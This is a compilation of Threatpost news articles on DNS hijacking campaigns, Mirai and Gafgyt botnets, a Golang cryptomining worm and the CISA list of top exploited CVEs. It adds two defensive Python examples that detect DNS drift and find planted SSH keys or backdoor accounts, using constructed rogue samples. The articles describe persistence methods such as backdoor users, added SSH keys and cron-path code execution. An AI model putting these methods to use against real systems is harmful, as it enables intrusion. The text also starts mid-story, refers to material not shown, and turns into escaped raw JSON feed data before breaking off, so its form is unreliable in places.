DNS-based attacks are an increasing worry for governments and enterprises alike.

[Image: DNS hijack attack vector](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)

[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security ordered all federal agencies to urgently audit DNS security for their domains within 10 business days.

Also [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, the Middle East and North Africa was linked to Iran. The attacks, which were related to a campaign dubbed "DNSpionage" by Cisco Talos researchers, had a high degree of success harvesting targets' credentials, according to the firm.

However, Talos researchers said they assess with high confidence that the DNSpionage operations are "distinctly different and independent" from the Sea Turtle campaign.

"The report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations," Williams told Threatpost. "DNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns' level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims.
Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups."

To protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service and multi-factor authentication (to access DNS records), and of course stay up to date on patches, especially on internet-facing machines.

However, "once these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked," he told Threatpost.
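Registry locks and MFA are meant to stop the change; monitoring is what tells you it happened anyway. The following is an added example, not Cisco Talos tooling: it keeps a per-domain baseline of expected name servers, expected address prefixes and the SHA-256 fingerprint of the certificate the site serves, and reports drift in any of the three, which is what a Sea Turtle-style NS rewrite, a redirect to an actor-controlled host, and the certificate-impersonation technique described above would each produce. The domain, prefixes and fingerprints are constructed samples; `observe_live()` collects the address and certificate parts for a real name with the standard library only, so the NS set has to be supplied by the caller from `dig NS` or a resolver library.

```python
"""Detect DNS hijacking and certificate impersonation by comparing live answers
against a recorded baseline. Added example, not Cisco Talos code. Names, prefixes
and fingerprints below are constructed; 192.0.2.0/24 and 198.51.100.0/24 are
RFC 5737 documentation ranges and rogue-dns.test is a reserved test-domain name.
"""
import hashlib
import ipaddress
import socket
import ssl
from typing import Dict, Iterable, List, Optional

Baseline = Dict[str, object]
Observation = Dict[str, object]


def check_domain(baseline: Baseline, observed: Observation) -> List[str]:
    """Alerts for NS drift, addresses outside expected prefixes and a changed certificate."""
    alerts: List[str] = []
    exp_ns = {n.lower().rstrip('.') for n in baseline.get('ns', [])}
    obs_ns = {n.lower().rstrip('.') for n in observed.get('ns', [])}
    if exp_ns and obs_ns != exp_ns:
        alerts.append(f'NS set changed: added {sorted(obs_ns - exp_ns)}, '
                      f'removed {sorted(exp_ns - obs_ns)}')
    allowed = [ipaddress.ip_network(p) for p in baseline.get('prefixes', [])]
    for ip in observed.get('a', []):
        addr = ipaddress.ip_address(ip)
        if allowed and not any(addr in net for net in allowed):
            alerts.append(f'A record {ip} is outside the expected prefixes')
    exp_fp, obs_fp = baseline.get('cert_sha256'), observed.get('cert_sha256')
    if exp_fp and obs_fp and str(exp_fp).lower() != str(obs_fp).lower():
        alerts.append('TLS certificate fingerprint changed (possible impersonated certificate)')
    return alerts


def cert_fingerprint(pem: str) -> str:
    """SHA-256 over the DER certificate, i.e. what `openssl x509 -fingerprint -sha256` prints."""
    return hashlib.sha256(ssl.PEM_cert_to_DER_cert(pem)).hexdigest()


def observe_live(name: str, ns: Iterable[str] = (), port: int = 443) -> Observation:
    """Collect A records and the served certificate for `name` (needs network access).

    The certificate is fetched without chain validation on purpose: an impersonated
    certificate from another CA validates fine, and only the fingerprint gives it away.
    """
    addrs = sorted({info[4][0] for info in socket.getaddrinfo(name, port, socket.AF_INET)})
    fp: Optional[str] = None
    try:
        fp = cert_fingerprint(ssl.get_server_certificate((name, port)))
    except (OSError, ssl.SSLError):
        pass  # endpoint down or not speaking TLS; the A-record check still runs
    return {'ns': list(ns), 'a': addrs, 'cert_sha256': fp}


# Constructed baseline and observations for a fictional VPN portal.
BASELINE: Dict[str, Baseline] = {
    'vpn.example.net': {
        'ns': ['ns1.example.net', 'ns2.example.net'],
        'prefixes': ['192.0.2.0/24'],
        'cert_sha256': '1f' * 32,   # placeholder fingerprint, not a real certificate
    },
}
OBSERVED_CLEAN: Observation = {
    'ns': ['ns1.example.net.', 'NS2.example.net.'],   # trailing dots and case are normalised
    'a': ['192.0.2.10'],
    'cert_sha256': '1F' * 32,
}
OBSERVED_HIJACKED: Observation = {   # what a Sea Turtle-style rewrite looks like
    'ns': ['ns1.example.net', 'ns1.rogue-dns.test'],
    'a': ['198.51.100.40'],
    'cert_sha256': '2a' * 32,
}

if __name__ == '__main__':
    for label, obs in (('clean', OBSERVED_CLEAN), ('hijacked', OBSERVED_HIJACKED)):
        print(label, check_domain(BASELINE['vpn.example.net'], obs) or ['no drift'])
```

Run the check from several vantage points and resolvers, since a hijack may be applied for minutes and only for some queriers; the article notes the window ranged from minutes to days. Pair the fingerprint check with Certificate Transparency log monitoring for your domains, which catches the impersonated certificate at issuance rather than at first use.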
Source: Threatpost, "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally," published 2019-04-17 (corpus last seen 2020-03-24), <https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/>. CVEs referenced: CVE-2009-1151, CVE-2017-6736, CVE-2018-7600, CVE-2020-1938. CVSS v2 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C).

---

Researchers have discovered new variants of the infamous Mirai and Gafgyt IoT botnets – now targeting well-known vulnerabilities in Apache Struts and SonicWall.

The new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall's Global Management System, according to researchers with Palo Alto Networks in a [Sunday](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>) post.

"Here we're seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises," Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. "Ultimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective.
For now, it looks like the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS."

**Mirai Evolves**

Researchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.

The variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted Content-Type, Content-Disposition or Content-Length HTTP headers to launch an arbitrary command-execution attack.

Though a patch has been available for over a year now, many organizations have not updated their systems – an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.

Flaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>) (CVE-2018-11776), which was patched in August.

The other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw
(CVE-2017-6884) in Zyxel routers.

Unit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August – an IP address that was hosting a new version of Gafgyt as well.

**Gafgyt Adds to Bag of Tricks**

In August, the observed IP was "intermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS)," according to Nigam.

The targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) stems from a lack of validation of user-supplied parameters passed to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.

This vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.

SonicWall has been notified of this latest development with Gafgyt, researchers said.

"The vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS," a SonicWall spokesperson told Threatpost. "The issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability.
Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018."

The Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.

Once in, it fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION> and installs the update. After that, the botnet launches a BlackNurse DDoS attack, a method first documented in November 2016 in which a flood of ICMP Type 3 Code 3 (destination unreachable, port unreachable) packets causes high CPU load on the target.

"One thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method," Nigam told us. "The earliest samples I have seen supporting this DDoS method are from September 2017."

**Continued Development**

The discovery of these newly targeted vulnerabilities comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).

In October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct.
2016, with Mirai variants continuing to pop up left and right since then.

Most recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).

Source: Threatpost, "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws," published 2018-09-10 (corpus last seen 2019-05-30), <https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>. CVEs referenced: CVE-2017-5638, CVE-2017-6884, CVE-2018-10561, CVE-2018-10562, CVE-2018-11776, CVE-2018-9866. CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

---

A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.

The malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching for and infecting other vulnerable machines.
Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.

According to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls "Golang," originally targeted only Linux machines, but has now spread to Windows and other servers.

"This new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL," explained the researchers. They added, "While the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China."

The malicious code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for Elasticsearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. "[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)"; and CVE-2018-20062 for the ThinkPHP framework.

Other exploits that don't have CVEs are also used to attack Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution "by dumping the db file into cron path," according to Barracuda.

"Some of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China," according to the report.
"As in other families of malware, it is safe to assume that this malware will keep evolving, employing more and more exploits."

## **A Golang Malware**

Notably, the malware is written in the Go language (Golang).

Golang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others, as the functions imported from other libraries are compiled into the binary itself. It also has a unique way of calling functions and storing symbols and data.

"Although the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware," according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.

## **Under the Hood**

Once the malware infects a machine, it downloads a set of files that are customized for the platform it is attacking. One of those files positions the malware to do more damage than simply installing a cryptominer.

The file sets typically include the initial loader payload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.

Of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.

"If it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account," explained the researchers.

The scanner file, meanwhile, is the malware's worm propagation mechanism.
It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports the success back to the C2.

For Windows machines, the malware also adds a backdoor user, researchers found – essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding an authorized SSH key to the system.

"Although the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators," Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. "This can be used for deploying additional attacks on the victim's machine and network, beyond the scope of cryptomining."

He added, "The cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future."
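The two persistence mechanisms just described, an extra local account on Windows and an added SSH key on Linux, are both simple to audit against a known-good list. The following is an added example, not Barracuda's code: it parses `authorized_keys` content, computes the same `SHA256:` fingerprint that `ssh-keygen -lf` prints, and reports keys missing from an allowlist; it also flags accounts in `/etc/passwd` that are absent from a baseline or that carry UID 0 under a name other than root. The key blobs, account names and file contents are constructed samples; `ADMIN_KEY` and `ROGUE_KEY` are synthetic encodings in the SSH wire format, not usable keys.

```python
"""Audit SSH authorized_keys and local accounts for backdoor additions.

Added example, not Barracuda's tooling. Sample keys, users and file contents are
constructed; the key blobs are synthetic wire-format encodings, not usable keys.
"""
import base64
import glob
import hashlib
from typing import Dict, Iterable, List, Set

KEY_TYPES = {'ssh-rsa', 'ssh-ed25519', 'ssh-dss', 'ecdsa-sha2-nistp256',
             'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp521',
             'sk-ssh-ed25519@openssh.com', 'sk-ecdsa-sha2-nistp256@openssh.com'}
NOLOGIN_SHELLS = {'/usr/sbin/nologin', '/sbin/nologin', '/bin/false', '/usr/bin/false'}


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA-256 over the decoded key blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')


def parse_authorized_keys(text: str) -> List[Dict[str, object]]:
    """One record per key line: line number, options (if any), key type, fingerprint, comment."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        tokens = line.split()
        # Options such as from="..." or command="..." may precede the key type.
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            records.append({'line': lineno, 'type': '?', 'fingerprint': '?',
                            'options': line, 'comment': '(unparseable line)'})
            continue
        records.append({'line': lineno, 'type': tokens[idx],
                        'fingerprint': fingerprint(tokens[idx + 1]),
                        'options': ' '.join(tokens[:idx]),
                        'comment': ' '.join(tokens[idx + 2:])})
    return records


def audit_keys(text: str, allowed_fingerprints: Set[str]) -> List[Dict[str, object]]:
    """Keys present in the file but absent from the allowlist (unparseable lines included)."""
    return [r for r in parse_authorized_keys(text) if r['fingerprint'] not in allowed_fingerprints]


def audit_passwd(text: str, known_users: Set[str]) -> List[Dict[str, object]]:
    """Accounts not in the baseline, or sharing UID 0 with root under another name."""
    hits = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith('#'):
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = raw.split(':', 6)
        reasons = []
        if name not in known_users:
            note = '' if shell in NOLOGIN_SHELLS else f', interactive shell {shell}'
            reasons.append('account not in baseline' + note)
        if uid == '0' and name != 'root':
            reasons.append('UID 0 under a name other than root')
        if reasons:
            hits.append({'name': name, 'uid': uid, 'shell': shell, 'reasons': reasons})
    return hits


def make_blob(key_type: bytes, key_bytes: bytes) -> str:
    """Synthetic public-key blob in SSH wire format (length-prefixed strings); sample data only."""
    def field(b: bytes) -> bytes:
        return len(b).to_bytes(4, 'big') + b
    return base64.b64encode(field(key_type) + field(key_bytes)).decode()


ADMIN_KEY = make_blob(b'ssh-ed25519', bytes(range(32)))
ROGUE_KEY = make_blob(b'ssh-ed25519', bytes(range(32, 64)))
SAMPLE_AUTHORIZED_KEYS = f"""# alice's workstation key, recorded in the allowlist
ssh-ed25519 {ADMIN_KEY} alice@workstation
from="*",no-pty ssh-ed25519 {ROGUE_KEY}
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysupdate:x:1001:1001::/home/sysupdate:/bin/bash
toor:x:0:0::/:/bin/sh
"""
ALLOWLIST = {fingerprint(ADMIN_KEY)}
KNOWN_USERS = {'root', 'daemon', 'alice'}


def collect_authorized_keys(patterns: Iterable[str] = ('/root/.ssh/authorized_keys',
                                                       '/home/*/.ssh/authorized_keys')) -> Dict[str, str]:
    """Every authorized_keys file we can open, keyed by path (Linux layout assumed)."""
    found = {}
    for pattern in patterns:
        for path in glob.glob(pattern):
            try:
                with open(path) as fh:
                    found[path] = fh.read()
            except OSError:
                continue
    return found


if __name__ == '__main__':
    files = collect_authorized_keys() or {'(sample)': SAMPLE_AUTHORIZED_KEYS}
    for path, text in files.items():
        for r in audit_keys(text, ALLOWLIST):
            print(f"{path}:{r['line']}: unlisted {r['type']} key {r['fingerprint']} {r['comment']}")
    for a in audit_passwd(SAMPLE_PASSWD, KNOWN_USERS):
        print(f"{a['name']} (uid {a['uid']}): {'; '.join(a['reasons'])}")
```

Feed the allowlist from your configuration management or from `ssh-keygen -lf` over the keys you actually issued; a key with no comment and restrictive-looking options is exactly how a worm-planted entry tends to look. On the Windows side the equivalent baseline comparison is `Get-LocalUser` against the expected account list, which this Python example does not cover.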
Source: Threatpost, "Golang Worm Widens Scope to Windows, Adds Payload Capacity," published 2020-06-25 (corpus last seen 2020-10-14), <https://threatpost.com/worm-golang-malware-windows-payloads/156924/>. CVEs referenced: CVE-2014-3120, CVE-2015-1427, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2020-5135. CVSS v2 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P).

---

In a perfect world, CISA would laminate cards with the year's top 30 vulnerabilities: You could whip it out and ask a business if they've bandaged these specific wounds before you hand over your cash.

This is not a perfect world. There are no laminated vulnerability cards.

But at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre and the UK's National Cyber Security Centre listed the vulnerabilities that were "routinely" exploited in 2020, as well as those that are most often being picked apart so far this year.

The vulnerabilities – which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian – include publicly known bugs, some of which are growing hair.
One, in fact, dates to 2000.

"Cyber actors continue to exploit publicly known – and often dated – software vulnerabilities against broad target sets, including public and private sector organizations worldwide," according to the advisory. "However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system."

So far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.

All of the vulnerabilities have received patches from vendors. That doesn't mean those patches have been applied, of course.

## Repent, O Ye Patch Sinners

According to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.

Why would they stop? As long as systems remain unpatched, it's a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.

> Adversaries' use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.
> — Advisory

In fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 and 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.

The top four:

 * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent – roughly one in six of the 80,000 companies affected – hadn't patched.
 * [CVE-2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.
 * [CVE-2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was still being actively exploited as of a few months ago, in April 2021.
 * [CVE-2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks' BIG-IP application delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.

The cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up.
For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE-2019-11510 | arbitrary file reading \nFortinet | CVE-2018-13379 | path traversal \nF5 BIG-IP | CVE-2020-5902 | remote code execution (RCE) \nMobileIron | CVE-2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE-2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. 
defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. 
The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. That raises the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Bar-Dayan said. 
\u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right 